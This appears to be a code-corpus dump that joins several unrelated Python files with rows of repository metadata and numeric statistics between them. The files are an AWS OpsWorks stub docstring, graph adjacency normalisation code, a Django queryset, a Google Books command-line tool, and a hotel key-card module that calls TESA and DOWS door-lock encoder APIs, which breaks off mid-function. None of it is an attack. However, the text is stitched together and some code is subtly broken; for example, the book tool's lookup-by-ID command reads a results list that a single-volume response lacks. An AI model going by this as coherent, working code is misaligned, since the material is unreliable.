AllowSelfManagement=True|False
)
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user IAM ARN. This can also be a federated user's ARN.
:type SshUsername: string
:param SshUsername: The user's SSH user name. The allowable characters are [a-z], [A-Z], [0-9], '-', and '_'. If the specified name includes other punctuation marks, AWS OpsWorks Stacks removes them. For example, my.name will be changed to myname . If you do not specify an SSH user name, AWS OpsWorks Stacks generates one from the IAM user name.
:type SshPublicKey: string
:param SshPublicKey: The user's new SSH public key.
:type AllowSelfManagement: boolean
:param AllowSelfManagement: Whether users can specify their own SSH public key through the My Settings page. For more information, see Managing User Permissions .
"""
pass
def update_volume(VolumeId=None, Name=None, MountPoint=None):
"""
Updates an Amazon EBS volume's name or mount point. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.update_volume(
VolumeId='string',
Name='string',
MountPoint='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The volume ID.
:type Name: string
:param Name: The new name.
:type MountPoint: string
:param MountPoint: The new mount point.
"""
pass
| 43.371495 | 994 | 0.634861 | 19,286 | 168,585 | 5.520274 | 0.066732 | 0.018701 | 0.020119 | 0.015583 | 0.796664 | 0.770082 | 0.753231 | 0.732633 | 0.716937 | 0.699213 | 0 | 0.015548 | 0.291159 | 168,585 | 3,886 | 995 | 43.382656 | 0.875364 | 0.869555 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.513514 | 0 | 0 | 0.5 | 0.006757 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
5f31fc6f929678dfb8bc0c274ac986acee8bb9e0 | 3,383 | py | Python | code/get_adj.py | xjy912/DGMP-1 | 36da2288f95b49829b85e3b42dc65b9eda9606b0 | [
"MIT"
] | 1 | 2022-03-11T18:33:33.000Z | 2022-03-11T18:33:33.000Z | code/get_adj.py | xjy912/DGMP-1 | 36da2288f95b49829b85e3b42dc65b9eda9606b0 | [
"MIT"
] | null | null | null | code/get_adj.py | xjy912/DGMP-1 | 36da2288f95b49829b85e3b42dc65b9eda9606b0 | [
"MIT"
] | null | null | null | import os.path as osp
import numpy as np
import scipy.sparse as sp
import networkx as nx
import pandas as pd
import os
import torch
import torch_geometric.transforms as T
from torch_geometric.data import Data
from torch_geometric.utils import to_undirected, is_undirected, to_networkx
from networkx.algorithms.components import is_weakly_connected
from torch_geometric.utils import add_remaining_self_loops, add_self_loops, remove_self_loops
from torch_scatter import scatter_add
import scipy
def get_undirected_adj(edge_index, num_nodes, dtype):
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
fill_value = 1
edge_index, edge_weight = add_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow(-0.5)
deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]
def get_in_directed_adj(edge_index, num_nodes, dtype):
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
fill_value = 1
edge_index, edge_weight = add_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv = deg.pow(-1)
deg_inv[deg_inv == float('inf')] = 0
p = deg_inv[row] * edge_weight
p_dense = torch.sparse.FloatTensor(edge_index, p, torch.Size([num_nodes,num_nodes])).to_dense()
L = torch.mm(p_dense.t(), p_dense)
# make nan to 0
L[torch.isnan(L)] = 0
# transfer dense L to sparse
L_indices = torch.nonzero(L,as_tuple=False).t()
L_values = L[L_indices[0], L_indices[1]]
edge_index = L_indices
edge_weight = L_values
# row normalization
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow(-0.5)
deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]
def get_out_directed_adj(edge_index, num_nodes, dtype):
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
fill_value = 1
edge_index, edge_weight = add_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv = deg.pow(-1)
deg_inv[deg_inv == float('inf')] = 0
p = deg_inv[row] * edge_weight
p_dense = torch.sparse.FloatTensor(edge_index, p, torch.Size([num_nodes,num_nodes])).to_dense()
L = torch.mm(p_dense, p_dense.t())
# make nan to 0
L[torch.isnan(L)] = 0
# transfer dense L to sparse
L_indices = torch.nonzero(L,as_tuple=False).t()
L_values = L[L_indices[0], L_indices[1]]
edge_index = L_indices
edge_weight = L_values
# row normalization
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow(-0.5)
deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col] | 34.876289 | 99 | 0.686077 | 540 | 3,383 | 3.981481 | 0.146296 | 0.113023 | 0.069767 | 0.053023 | 0.820465 | 0.793488 | 0.793488 | 0.793488 | 0.793488 | 0.793488 | 0 | 0.011972 | 0.209873 | 3,383 | 97 | 100 | 34.876289 | 0.792368 | 0.034585 | 0 | 0.732394 | 0 | 0 | 0.004601 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042254 | false | 0 | 0.197183 | 0 | 0.28169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a06a87087d2f7a3214022e6036d5967605ae5ab7 | 216 | py | Python | pages/managers.py | buketkonuk/pythondotorg | 4d8d9728eea7c7b2fef32eb6f24fda409cf24a06 | [
"Apache-2.0"
] | 911 | 2015-01-03T22:16:06.000Z | 2022-03-31T23:56:22.000Z | pages/managers.py | buketkonuk/pythondotorg | 4d8d9728eea7c7b2fef32eb6f24fda409cf24a06 | [
"Apache-2.0"
] | 1,342 | 2015-01-02T16:14:45.000Z | 2022-03-28T08:01:20.000Z | pages/managers.py | buketkonuk/pythondotorg | 4d8d9728eea7c7b2fef32eb6f24fda409cf24a06 | [
"Apache-2.0"
] | 551 | 2015-01-04T02:17:31.000Z | 2022-03-23T11:59:25.000Z | from django.db.models.query import QuerySet
class PageQuerySet(QuerySet):
def published(self):
return self.filter(is_published=True)
def draft(self):
return self.filter(is_published=False)
| 21.6 | 46 | 0.717593 | 28 | 216 | 5.464286 | 0.642857 | 0.130719 | 0.183007 | 0.261438 | 0.405229 | 0.405229 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189815 | 216 | 9 | 47 | 24 | 0.874286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
a09546051c05f3cce2b05ebfd6611666c5ad53d2 | 7,040 | py | Python | googlebooks.py | toza-mimoza/Python-Google-Books-CLI | bcadf5a7b5ddcd60ad6c37742917a38a13df9bc6 | [
"MIT"
] | null | null | null | googlebooks.py | toza-mimoza/Python-Google-Books-CLI | bcadf5a7b5ddcd60ad6c37742917a38a13df9bc6 | [
"MIT"
] | null | null | null | googlebooks.py | toza-mimoza/Python-Google-Books-CLI | bcadf5a7b5ddcd60ad6c37742917a38a13df9bc6 | [
"MIT"
] | null | null | null | import json
import click
import requests
import webbrowser
__author__ = "toza-mimoza"
@click.group()
def main():
"""
CLI for querying books on Google Books by toza-mimoza
"""
pass
@main.command()
@click.argument('query')
def search(query):
"""This search and return results corresponding to the given query from Google Books"""
url_format = 'https://www.googleapis.com/books/v1/volumes'
query = "+".join(query.split())
query_params = {
'q': query
}
response = requests.get(url_format, params=query_params)
#resp_list=[requests.get(url_format,params=query_params)]
responseInJSON=response.json()
with open('searchQuery.json','w') as json_file: #stores a query
json.dump(responseInJSON,json_file)
# click.echo(json.dumps(responseInJSON,indent=10))
for i in range(len(responseInJSON['items'])):
volInfo=responseInJSON['items'][i]['volumeInfo']
salInfo=responseInJSON['items'][i]['saleInfo']
accInfo=responseInJSON['items'][i]['accessInfo']
click.echo("__________________________________________________________________________________")
click.echo("Title:\t\t "+volInfo['title'])
if ('subtitle' in volInfo):
click.echo(" "+str(volInfo['subtitle']))
if('description' in volInfo):
click.echo("Description:\t "+volInfo['description'])
if ('authors' not in volInfo):
click.echo("Authors:\t UNKNOWN")
pass
elif len(volInfo['authors'])==1:
click.echo("Author:\t\t "+str(volInfo['authors'][0]))
elif len(volInfo['authors'])>1:
for author in volInfo['authors']:
click.echo("Author:\t\t "+author)
pass
pass
if ('publishedDate' not in volInfo):
click.echo("Published date:\t UNKNOWN")
else:
click.echo("Published date:\t "+volInfo['publishedDate'])
if ('pageCount' not in volInfo):
click.echo("Page count:\t UNKNOWN")
else:
click.echo("Page count:\t "+str(volInfo['pageCount']))
click.echo("Language:\t "+volInfo['language'])
click.echo("Sale Info: ")
click.echo(" Country:\t "+salInfo['country'])
if salInfo['saleability']=='FOR_SALE':
click.echo(" Price:\t "+str(salInfo['retailPrice']['amount'])+" "+salInfo['retailPrice']['currencyCode'])
if salInfo['retailPrice']['amount']==0.0:
click.echo(" Opening...")
url=accInfo['webReaderLink']
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None, webbrowser.BackgroundBrowser(chrome_path))
webbrowser.get('chrome').open_new_tab(url)
elif salInfo['saleability']=='FREE':
click.echo(" Price:\t The book is FREE!")
click.echo(" Opening...")
if 'downloadLink' not in accInfo['pdf']:
click.echo("NO DOWNLOAD LINK...")
if 'webReaderLink' not in accInfo:
click.echo("NO WEB READER LINK")
pass
else:
url=accInfo['webReaderLink']
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None,webbrowser.BackgroundBrowser(chrome_path))
webbrowser.get('chrome').open_new_tab(url)
pass
else:
url=accInfo['pdf']['downloadLink']
# file_name=volInfo['title'] #later for naming the downloaded file
chrome_path="C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
webbrowser.register('chrome', None,webbrowser.BackgroundBrowser(chrome_path))
webbrowser.get('chrome').open_new_tab(url)
pass
elif salInfo['saleability']=='NOT_FOR_SALE':
click.echo(" Price:\t NOT FOR SALE")
pass
pass
@main.command()
@click.argument('id')
def get(id):
"""This return a particular book from the given id on Google Books"""
url_format = 'https://www.googleapis.com/books/v1/volumes/{}'
click.echo(id)
response = requests.get(url_format.format(id))
responseInJSON=response.json()
with open('searchQuery.json','w') as json_file: #stores a query
json.dump(responseInJSON,json_file)
for i in range(len(responseInJSON['items'])):
volInfo=responseInJSON['items'][i]['volumeInfo']
salInfo=responseInJSON['items'][i]['saleInfo']
accInfo=responseInJSON['items'][i]['accessInfo']
click.echo("__________________________________________________________________________________")
click.echo("Title:\t\t "+volInfo['title'])
if ('subtitle' in volInfo):
click.echo(" "+str(volInfo['subtitle']))
if ('authors' not in volInfo):
click.echo("Authors:\t UNKNOWN")
pass
elif len(volInfo['authors'])==1:
click.echo("Author:\t\t "+str(volInfo['authors'][0]))
elif len(volInfo['authors'])>1:
for author in volInfo['authors']:
click.echo("Author:\t\t "+author)
pass
pass
if ('publishedDate' not in volInfo):
click.echo("Published date:\t UNKNOWN")
else:
click.echo("Published date:\t "+volInfo['publishedDate'])
if ('pageCount' not in volInfo):
click.echo("Page count:\t UNKNOWN")
else:
click.echo("Page count:\t "+str(volInfo['pageCount']))
click.echo("Language:\t "+volInfo['language'])
click.echo("Sale Info: ")
click.echo(" Country:\t "+salInfo['country'])
if salInfo['saleability']=='FOR_SALE':
click.echo(" Price:\t "+str(salInfo['retailPrice']['amount'])+" "+salInfo['retailPrice']['currencyCode'])
pass
elif salInfo['saleability']=='FREE':
click.echo(" Price:\t The book is FREE!")
######
click.echo(" Downloading...")
url=accInfo['pdf']['downloadLink']
file_name=volInfo['title']
r=requests.get(url)
with open(file_name+".pdf", "wb") as code:
code.write(r.content)
pass
click.echo("File downloaded! ")
######
pass
elif salInfo['saleability']=='NOT_FOR_SALE':
click.echo(" Price:\t NOT FOR SALE")
pass
pass
if __name__ == "__main__":
main() | 39.111111 | 121 | 0.547585 | 712 | 7,040 | 5.119382 | 0.19382 | 0.101235 | 0.034568 | 0.044444 | 0.799726 | 0.775583 | 0.775583 | 0.755281 | 0.73059 | 0.73059 | 0 | 0.003696 | 0.308239 | 7,040 | 180 | 122 | 39.111111 | 0.744764 | 0.056534 | 0 | 0.751773 | 0 | 0 | 0.279707 | 0.047033 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0.120567 | 0.028369 | 0 | 0.049645 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
cd578e0458d5ed79f927db11e9c635c287a460cb | 19,467 | py | Python | inn/inn_hotels/doctype/inn_key_card/inn_key_card.py | vinhnguyent090/front-desk | 7384642e9206e30855986465a7ef63c8fd76ef2a | [
"MIT"
] | 4 | 2021-08-19T03:33:36.000Z | 2021-08-28T16:37:52.000Z | inn/inn_hotels/doctype/inn_key_card/inn_key_card.py | vinhnguyent090/front-desk | 7384642e9206e30855986465a7ef63c8fd76ef2a | [
"MIT"
] | 98 | 2020-02-24T08:12:47.000Z | 2021-08-21T07:54:03.000Z | inn/inn_hotels/doctype/inn_key_card/inn_key_card.py | vinhnguyent090/front-desk | 7384642e9206e30855986465a7ef63c8fd76ef2a | [
"MIT"
] | 13 | 2021-01-24T18:08:43.000Z | 2022-03-29T09:23:25.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Core Initiative and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from datetime import datetime, timedelta
import frappe
import requests
import json
from frappe.model.document import Document
class InnKeyCard(Document):
pass
@frappe.whitelist()
def room_max_active_card():
return frappe.db.get_single_value('Inn Hotels Setting', 'room_max_active_card')
@frappe.whitelist()
def issue_card(reservation_id):
door_lock_provider = frappe.db.get_single_value('Inn Hotels Setting', 'door_lock_api_provider')
if door_lock_provider == 'TESA':
doc = frappe.get_doc('Inn Reservation', reservation_id)
room = doc.actual_room_id
expiryDate = datetime.strftime(doc.departure, "%d/%m/%Y")
cards = doc.issued_card
active_card = 0
for card in cards:
active_card += int(card.is_active)
if active_card == 0:
cmd = "CI"
else:
cmd = "CG"
new_card = frappe.new_doc('Inn Key Card')
new_card.card_number = tesa_checkin(cmd, room, expiryDate)
if new_card.card_number == "E2" or new_card.card_number == "ED":
return 'ERROR'
else:
new_card.room_id = doc.actual_room_id
new_card.issue_date = datetime.today()
new_card.expired_date = doc.departure
new_card.parent = doc.name
new_card.parentfield = 'issued_card'
new_card.parenttype = 'Inn Reservation'
new_card.insert()
return new_card.card_number
elif door_lock_provider == 'DOWS':
doc = frappe.get_doc('Inn Reservation', reservation_id)
room = doc.actual_room_id
expiryDate = datetime.strftime(doc.departure, "%Y-%m-%d")
new_card = frappe.new_doc('Inn Key Card')
new_card.card_number = dows_checkin("01", room, expiryDate)
if new_card.card_number is None:
return 'ERROR'
else:
new_card.room_id = doc.actual_room_id
new_card.issue_date = datetime.today()
new_card.expired_date = doc.departure
new_card.parent = doc.name
new_card.parentfield = 'issued_card'
new_card.parenttype = 'Inn Reservation'
new_card.insert()
return new_card.card_number
@frappe.whitelist()
def erase_card(flag, card_name):
door_lock_provider = frappe.db.get_single_value('Inn Hotels Setting', 'door_lock_api_provider')
if door_lock_provider == 'TESA':
doc = frappe.get_doc('Inn Key Card', card_name)
room = doc.room_id
expiryDate = datetime.strftime(datetime.today() - timedelta(1), '%d/%m/%Y')
if flag == 'with':
card_number_returned = tesa_erase()
if card_number_returned == doc.card_number:
doc.expired_date = datetime.today() - timedelta(1)
doc.is_active = 0
doc.save()
return doc.is_active
elif card_number_returned == "E2" or card_number_returned == "ED":
return 'ERROR'
elif flag == 'without':
doc.expired_date = datetime.today() - timedelta(1)
doc.is_active = 0
doc.save()
return doc.is_active
elif door_lock_provider == 'DOWS':
doc = frappe.get_doc('Inn Key Card', card_name)
room = doc.room_id
if flag == 'with':
message_erase = dows_erase(room)
if message_erase is not None:
doc.is_active = 0
doc.save()
return doc.is_active
elif flag == 'without':
doc.expired_date = datetime.today() - timedelta(1)
doc.is_active = 0
doc.save()
return doc.is_active
def tesa_erase():
# api-endpoint
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/checkin'
# defining a params dict for the parameters to be sent to the API
params = {
"cmd": "CI",
"room": "999",
"activationDate": datetime.today().strftime("%d/%m/%Y"),
"activationTime": "12:00",
"expiryDate": (datetime.today() - timedelta(1)).strftime("%d/%m/%Y"),
"expiryTime": "12:00",
"returnCardId": "1"
}
if api_checkin_url is not None:
if int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth')) == 1:
auth = (frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user'),
frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password'))
r = requests.post(api_checkin_url, json=params, auth=auth)
else:
r = requests.post(api_checkin_url, json=params)
if r:
returned = json.loads(r.text)
msg_hex = returned['rawMsgHex']
data = msg_hex.split("B3")
card_number = bytearray.fromhex(data[-2]).decode()
r.close()
return card_number
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_checkin(cmd, room_id, expiry_date):
# api-endpoint
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/checkin'
# defining a params dict for the parameters to be sent to the API
params = {
"cmd": cmd,
"room": room_id.replace('R-', ''),
"activationDate": datetime.today().strftime("%d/%m/%Y"),
"activationTime": "12:00",
"expiryDate": expiry_date,
"expiryTime": "14:00",
"returnCardId": "1"
}
if api_checkin_url is not None:
if int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth')) == 1:
auth = (frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user'),
frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password'))
r = requests.post(api_checkin_url, json=params, auth=auth)
else:
r = requests.post(api_checkin_url, json=params)
if r:
returned = json.loads(r.text)
msg_hex = returned['rawMsgHex']
data = msg_hex.split("B3")
card_number = bytearray.fromhex(data[-2]).decode()
r.close()
return card_number
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_verify(track):
# api-endpoint
api_verify_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/verify'
# defining a params dict for the parameters to be sent to the API
params = {
"cmd": "RC",
"technology": "P",
"cardOperation": "RP",
"encoder": "1",
"format": "T",
"track": track
}
if api_verify_url is not None:
if int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth')) == 1:
auth = (frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user'),
frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password'))
r = requests.post(api_verify_url, json=params, auth=auth)
else:
r = requests.post(api_verify_url, json=params)
if r:
returned = json.loads(r.text)
r.close()
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def dows_checkin(building, room_id, expiry_date):
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/checkin'
params = {
"building": building,
"room": room_id.replace('R-', '').zfill(4),
"door": "00",
"arrival": datetime.today().strftime("%Y-%m-%d") + " 12:00:00",
"departure": expiry_date + " 14:00:00",
}
if api_checkin_url is not None:
s = requests.Session()
headers = {"Content-Type": "application/json"}
req = requests.Request('POST', api_checkin_url, json=params, headers=headers)
prepped = s.prepare_request(req)
del prepped.headers['Connection']
del prepped.headers['Accept-Encoding']
del prepped.headers['Accept']
r = s.send(prepped)
if r:
returned = json.loads(r.text)
r.close()
return returned['cardNo']
else:
frappe.msgprint("Error. Fail to Connect to CardEncoder. Please wait a moment and try again.")
def dows_verify():
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/verify'
if api_checkin_url is not None:
s = requests.Session()
req = requests.Request('GET', api_checkin_url)
prepped = s.prepare_request(req)
del prepped.headers['Connection']
del prepped.headers['Accept-Encoding']
del prepped.headers['Accept']
r = s.send(prepped)
if r:
returned = json.loads(r.text)
r.close()
return returned
def dows_erase(room_id):
api_checkin_url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url') + '/erase/' + room_id.replace('R-', '').zfill(4)
if api_checkin_url is not None:
s = requests.Session()
req = requests.Request('DELETE', api_checkin_url)
prepped = s.prepare_request(req)
del prepped.headers['Connection']
del prepped.headers['Accept-Encoding']
del prepped.headers['Accept']
r = s.send(prepped)
if r:
returned = json.loads(r.text)
r.close()
return returned['cardNo']
@frappe.whitelist()
def test_api(option):
if option == "1":
frappe.msgprint("tesa_read_card1")
returned = tesa_read_card1("3")
frappe.msgprint("User = " + returned['user'])
frappe.msgprint("Expiry Date = " + returned['expiryDate'])
frappe.msgprint("Info = " + returned['info'])
elif option == "2":
frappe.msgprint("tesa_read_card2")
returned = tesa_read_card2("3")
frappe.msgprint("User = " + returned['user'])
frappe.msgprint("Expiry Date = " + returned['expiryDate'])
frappe.msgprint("Info = " + returned['info'])
elif option == "3":
frappe.msgprint("tesa_read_card3")
returned = tesa_read_card3("3")
frappe.msgprint("User = " + returned['user'])
frappe.msgprint("Expiry Date = " + returned['expiryDate'])
frappe.msgprint("Info = " + returned['info'])
elif option == "4":
frappe.msgprint("tesa_read_card4")
returned = tesa_read_card4("3")
frappe.msgprint("User = " + returned['user'])
frappe.msgprint("Expiry Date = " + returned['expiryDate'])
frappe.msgprint("Info = " + returned['info'])
@frappe.whitelist()
def verify_card(track):
door_lock_provider = frappe.db.get_single_value('Inn Hotels Setting', 'door_lock_api_provider')
if door_lock_provider == 'TESA':
returned = tesa_verify(track)
frappe.msgprint("User = " + returned['user'])
frappe.msgprint("Expiry Date = " + returned['expiryDate'])
frappe.msgprint("Expiry Time = " + returned['expiryTime'])
elif door_lock_provider == 'DOWS':
returned = dows_verify()
frappe.msgprint("Room = R-" + returned['room'].lstrip("0"))
frappe.msgprint("Expiry Date = " + returned['departure'])
def tesa_check_in(cmd, room, activationDate, activationTime, expiryDate, expiryTime,
pcId="", technology="P", encoder="1", cardOperation="EF", grant=None, keypad=None, operator=None,
track1=None, track2=None, room2=None, room3=None, room4=None, returnCardId=None, cardId=None):
# Example Post
# {"pcId": "1", "cmd": "PI", "room": "102", "activationDate": "16/05/2017",
# "activationTime": "12:00", "expiryDate": "17/05/2017", "expiryTime": "12:00",
# "cardOperation": "RP", "operator": "tesa"}
# api-endpoint
url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
# defining header JSON
headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
# defining auth to be sent to the API
if is_card_use_auth == 1:
auth = (username, password)
# defining a params dict for the parameters to be sent to the API
params = {
'pcId': pcId,
'cmd': cmd,
'technology': technology,
'cardOperation': cardOperation,
'encoder': encoder,
'room': room,
'activationDate': activationDate,
'activationTime': activationTime,
'expiryDate': expiryDate,
'expiryTime': expiryTime,
}
# Optional params assignment if provided
if grant is not None:
params.update({'grant': grant})
if keypad is not None:
params.update({'keypad': keypad})
if operator is not None:
params.update({'operator': operator})
if track1 is not None:
params.update({'track1': track1})
if track2 is not None:
params.update({'track2': track2})
if room2 is not None:
params.update({'room2': room2})
if room3 is not None:
params.update({'room3': room3})
if room4 is not None:
params.update({'room4': room4})
if returnCardId is not None:
params.update({'returnCardId': returnCardId})
if cardId is not None:
params.update({'cardId': cardId})
if url is not None:
if is_card_use_auth == 1:
r = requests.post(url, data=params, headers=headers, auth=auth)
else:
r = requests.post(url, data=params, headers=headers)
if r:
returned = json.loads(r.text)
return returned['returnCardId']
else:
return "CARD NUMBER FROM TESA CHECK IN"
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_read_card(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message="" ):
# Example Post
# {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
# "1", "format": "T", "track": "3", "message": ""}
# api-endpoint
url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
# defining header JSON
headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
# defining auth to be sent to the API
if is_card_use_auth == 1:
auth = (username, password)
# defining a params dict for the parameters to be sent to the API
params = {
'pcId': pcId,
'cmd': cmd,
'technology': technology,
'cardOperation': cardOperation,
'encoder': encoder,
'format': format,
'track': track,
'message': message,
}
if url is not None:
if is_card_use_auth == 1:
r = requests.post(url, data=params, headers=headers, auth=auth)
else:
r = requests.post(url, data=params, headers=headers)
if r:
returned = json.loads(r.text)
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_read_card1(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message="" ):
# Example Post
# {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
# "1", "format": "T", "track": "3", "message": ""}
# api-endpoint
url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
# defining header JSON
headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
# defining auth to be sent to the API
if is_card_use_auth == 1:
auth = (username, password)
# defining a params dict for the parameters to be sent to the API
params = {
'pcId': pcId,
'cmd': cmd,
'technology': technology,
'cardOperation': cardOperation,
'encoder': encoder,
'format': format,
'track': track,
'message': message,
}
if url is not None:
if is_card_use_auth == 1:
r = requests.post(url, json=params, auth=auth)
else:
r = requests.post(url, json=params)
if r:
print("headers: ")
print(r.headers)
returned = json.loads(r.text)
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_read_card2(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message="" ):
# Example Post
# {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
# "1", "format": "T", "track": "3", "message": ""}
# api-endpoint
url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
# defining header JSON
headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
# defining auth to be sent to the API
if is_card_use_auth == 1:
auth = (username, password)
# defining a params dict for the parameters to be sent to the API
params = {
'pcId': pcId,
'cmd': cmd,
'technology': technology,
'cardOperation': cardOperation,
'encoder': encoder,
'format': format,
'track': track,
'message': message,
}
if url is not None:
if is_card_use_auth == 1:
r = requests.post(url, data=json.dumps(params), auth=auth)
else:
r = requests.post(url, data=json.dumps(params))
if r:
print("headers: ")
print(r.headers)
returned = json.loads(r.text)
return returned
else:
frappe.msgprint("Card API url not defined yet. Define the URL in Inn Hotel Setting")
def tesa_read_card3(track, pcId="", cmd="RC", technology="P", cardOperation="EF", encoder="1", format="T", message="" ):
# Example Post
# {"pcId": "", "cmd": "RC", "technology": "P", "cardOperation": "EF", "encoder":
# "1", "format": "T", "track": "3", "message": ""}
# api-endpoint
url = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_url')
username = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_user')
password = frappe.db.get_single_value('Inn Hotels Setting', 'card_api_password')
is_card_use_auth = int(frappe.db.get_single_value('Inn Hotels Setting', 'card_use_auth'))
# defining header JSON
headers = {'Content-Type': 'application/json', 'Accept': 'text/plain'}
# defining auth to be sent to the API
if is_card_use_auth == 1:
auth = (username, password)
# defining a params dict for the parameters to be sent to the API
params = {
'pcId': pcId,
'cmd': cmd,
'technology': technology,
'cardOperation': cardOperation,
'encoder': encoder,
'format': format,
'track': track,
'message': message,
}
if url is not None:
